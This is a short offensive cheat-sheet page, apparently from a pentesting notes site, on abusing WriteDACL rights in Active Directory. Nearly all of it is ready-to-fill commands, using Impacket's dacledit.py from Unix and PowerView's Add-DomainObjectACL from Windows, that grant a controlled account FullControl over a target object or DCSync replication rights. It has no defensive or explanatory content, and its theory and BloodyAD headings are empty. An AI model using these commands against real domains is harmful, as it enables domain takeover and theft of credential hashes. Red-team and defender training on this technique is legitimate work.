đź’ĄCyb3rBook

GRANT RIGHTS (WRITEDACL)

1 min read

PRIMARY CATEGORY → DACL ABUSE

Theory

WriteDACL

Abuse - UNIX-like

Impacket’s DACLedit.py

DACLedit.py

Grant FullControl Right

GenericAll

dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights FullControl '<DOMAIN>/<USER>:<PASSWD>'
Grant DCSync Rights

DS-Replication-Get-Changes DS-Replication-Get-Changes-All

dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights DCSync '<DOMAIN>/<USER>:<PASSWD>'
BloodyAD

BloodyAD

Abuse - Windows

Powerview

Powerview.ps1

Grant FullControl Right

GenericAll

$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)
Add-DomainObjectACL -Credential $cred -Rights 'All' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'
Grant DCSync Rights

DS-Replication-Get-Changes DS-Replication-Get-Changes-All

$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)
Add-DomainObjectACL -Credential $cred -Rights 'DCSync' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'

Graph View

Backlinks